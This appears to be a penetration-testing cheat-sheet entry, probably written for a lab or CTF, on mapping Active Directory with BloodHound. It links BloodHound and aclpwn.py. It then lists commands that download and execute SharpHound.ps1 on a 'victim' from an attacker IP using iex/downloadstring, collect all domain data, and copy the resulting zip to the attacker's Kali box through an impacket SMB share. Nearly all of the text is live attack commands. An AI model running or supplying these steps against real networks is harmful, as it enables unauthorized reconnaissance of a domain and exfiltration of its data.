Bloodhound

GitHub - BloodHoundAD/BloodHound: Six Degrees of Domain AdminGitHub

The following tool aclpwn.py by foxit identifies and exploits ACL based privilege escalation paths

GitHub - fox-it/aclpwn.py: Active Directory ACL exploitation with BloodHoundGitHub

Copy SharpHound to the Victim

The first thing to do is copy the ShapHound.ps1 script to the victim

iex(new-object net.webclient).downloadstring('http://10.10.14.4/SharpHound.ps1')

Run the Collector

invoke-bloodhound -collectionmethod all

Get the Collected Files from the Victim

I like to use the impacket smbserver.py script

# On my Kali Box
smbserver.py -smb2support share /tmp/smb -username wasabi -password wasabi123 

# On the victim
net use \\10.10.11.12\share /u:wasabi wasabi123

# Now we can copy the files from the victim to our Kali box
copy XXXXXXX_Bloodhound.zip \\10.10.11.12\share\